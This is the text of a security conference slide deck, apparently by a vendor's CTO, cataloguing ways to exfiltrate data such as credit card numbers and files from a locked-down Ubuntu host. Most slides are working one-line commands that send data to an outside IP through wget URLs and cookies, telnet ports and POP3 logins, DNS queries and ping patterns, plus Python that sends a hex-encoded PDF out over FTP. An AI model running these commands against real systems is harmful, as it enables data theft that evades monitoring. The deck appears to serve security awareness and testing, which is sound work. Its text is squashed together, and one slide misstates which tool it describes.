GoodbyeData,HelloExfiltration

Itzik KotlerCTO&Co-FounderofSafeBreach

ExfiltrationistheNewInfiltration

• TheIdentifyTheftResourceCenter(ITRC)reportsthatbetween2005– 2016atotalof847,807,830 recordsexposedduetodatabreachincidents

• There’snoquestionIF acompanywillgetbreached,onlywhenandwhatwillbetheoutcome

• Gettinginispromised,butisgettingtotheASSET andEXFILTRATINGitisgiven?No…

GetintotheMindset…

RulesofEngagement

• Ubuntu14.04.3(Server)LTSVanillaInstallation

• StandardUserAccount(NoRoot/AdministratorPrivileges)

• Nocompilers(C,C++etc.)orInterpreters(Python,Rubyetc.)

• Read-onlyFilesystem

ChooseYourDestiny:Assets

• SocialSecurityNumber(SSN)• CreditCards(CC)• MedicalRecords(PHI)• PersonalRecords(PII)• ...

TCP

HTTPGET:ExfiltrationviaURL

• wget is afreesoftwarepackageforretrievingfilesusingHTTP,HTTPSandFTP.Itaccepts*any*URLasaparameter.

• Wecanuseabusewget’s URLparametertoembeddedourdatainit.

• It’ssimple andstraightforward,butworkslikeacharm:-)

$ wget http://192.168.1.88/4716846291594680

HTTPGET#2:ExfiltrationviaCookie

• wget alsoallowustospecifyourownHTTPHEADERS

• Wecanabusewget’s headerfeaturetospoofaCookie(e.g.JSESSIONID)andembeddedourdataasit’svalue

• Wecanspoofothercommonfieldssuchas:User-Agent,Accept,andIf-None-Matchtonameafew

$ wget --header="Cookie: JSESSIONID=4716846291594680" http://192.168.1.88

POP3:ExfiltrationviaAuthentication

$ telnet 192.168.1.88 110Trying 192.168.1.88...Connected to 192.168.1.88.Escape character is '^]'.+OK POP3 serviceUSER foobar+OK password required for user foobarPASS 4716846291594680-ERR [AUTH] Authentication failed

HowItWorks?

• telnetclientisafreesoftwareusedforopeninganinteractivecommunicationwith*any*hoston*any*TCPport

• POP3isatext-basedprotocolusedfor receivingemails,itrequiresauthenticationbeforeallowingaccesstoamailbox.

• Wecanabusetheauthenticationmechanism(notspecifictoPOP3)andusetheUSERNAMEand/orPASSWORDvalue(s)asawaytoexfiltrate thedata

TCP:ExfiltrationviaSYN(DestinationPort)

$ telnet 192.168.1.88 4716 ; telnet 192.168.1.88 8462 ; telnet 192.168.1.88 9159 ; telnet 192.168.1.88 4680Trying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refused

HowItWorks?

• ThetelnetclienttakeshostandTCPportasparameter.ItwillthenproceedtoopenTCPconnectiontothegivenhostatthegivenport.

• Wecanabusetelnet’sTCPportparametertoembeddedourdatainit.Thismeanswecontrola16-bitfieldinaSYNpacketthatwillbesentto*any*destinationwewant

• Bysplittingtheasset(i.e.4716846291594680) togroupsof4digits(e.g.4716 ,8462,9159etc.)wemakesureeachportfallswithintherangeofavalidTCPport(216).

UDP

DNS:ExfiltrationviaQuery(CustomServer)

• nslookup isafreesoftwareforqueryingDNSservers.ItacceptsanoptionalargumentofDNSservertoconnecttoforthequery

• WecanabusetheoptionalDNSserverargumenttoconnecttoourownserverandusethenameparameteraswaytoembeddedourdataintherequest

• Again,simpleandstraightforward-- butworkslikeacharm:-)

$ nslookup www.4716846291594680.com 192.168.1.88

DNS:ExfiltrationviaQuery(ControlledNS)

• Whenyouownadomain,yougettodecidetheNS(Nameserver)willbeusedtodeliverit.

• WecanuseabusethewaythattheDNSprotocolworkstogetahitonourNSserverandhavethedataembeddedinthehit(Query).

• It’ssimpleandstraightforward,butcostly;-)

$ nslookup 4716846291594680.safebreach.com

OtherUDPApplications

• ntpdate (123/udp)-- setthedateandtimeviaNTP• dhclient (68/udp)-- DynamicHostConfigurationProtocolClient

ICMP

ICMP:ECHOREQUEST(aka.Ping)

• wget is afreesoftwarepackageforretrievingfilesusingHTTP,HTTPSandFTP.Itaccepts*any*URLasaparameter.

• Wecanuseabuseping’spatternfeaturetoembeddedourdataintheICMPECHO_REQUESTpacket.

• It’ssimpleandstraightforward,butworkslikeacharm:-)

$ ping -p 4716846291594680 192.168.1.88

AssetChange

• SofarourassetwasaalphanumericString,butwhatifitwasBinary?ThismeansweneedEncoding

• Sofarourassetwasrelativelysmall,butwhatifitwasafilelikeaPDF,XLS,TIFFetc.?ThismeansweneedtoSplitit

• Forthesecases,let’sbendtherulesalittlebitandusePython(Python2.7.6comespreinstalledonourUbuntu;sowe’renotviolatingourRead-onlyFilesystem rule!)

EncodingwithPython

$ python>>> # SECRET.PDF Encoded in Hex >>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)>>> # SECRET.PDF Encoded in Base64>>> b64_encoded_asset = open(‘SECRET.PDF’).read().encode(‘base64’)>>> # Applying ROT13 on the Base64 Encoded Asset>>> b64_encoded_rot13_asset = b64_encoded_asset.encode(‘rot13’)

SplittingwithPython

$ python>>> # We’ll use SECRET.PDF Encoded in Hex as a Sample Asset>>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)>>> # Split by 16 bits (i.e. WORD Size)>>> import re>>> word_size_splitted = re.findall('..?', hex_encoded_asset)>>> # Split by 0xFF (i.e. Delimiter)>>> ff_splitted = hex_encoded_asset.split(‘ff’)

EndGame:MKDIR’ing anAssetoverFTP

$ python>>> import re>>> import ftplib>>> ftp = ftplib.FTP(‘192.168.1.88', ‘ftp', ‘ftp')>>> data = open(‘SECRET.PDF’).read().encode('hex')>>> for dir_name in re.findall('.?.?.?.?.?.?.?.', data):... i = locals().get('i', 0) + 1... ftp.mkd('%s_%s' % (i, dir_name))>>>

Let’sGetPhysical…

ChangingtheRules[ForTheLastTime!]

• ExfiltrationisnotaNetworkproblem,thereareotherwaystoextractdatafromaComputer.USBandThunderboltaretooobvious!

• Forthisonewe’llneedtobendtheRead-onlyFilesystem todownloadaPythonscript(nootherdependenciesarerequired!)

• It'stimetofacethemusic:-)

DEMO$ git clone https://github.com/iiamit/data-sound-poc$ cd data-sound-poc/$ python data2sound.py –i message.txt -o foobar.wav

HowItWorks?

• Modulation:• Wemodulatethedataononehand,anddemodulateitintheother.• Thisishowold-schoolModem(modulator-demodulator)areworking

• There’snoLayer1(e.g.V.42)orLayer2(HDLC,SLIP,PPP,etc.)sothere’sbothlimitedfunctionalityandbandwidth.Inotherwords,noteffectiveforbigfiles.

• Any3.5mmjackcanbeusedtooutputthedatafromalmostanyComputerwithHeadphonessupport.

Inlife,questionsareguaranteed;Answersaren't …

Twitter:@itzikkotler /Email:itzik@safebreach.com

Thank You!Twitter:@itzikkotler /Email:itzik@safebreach.com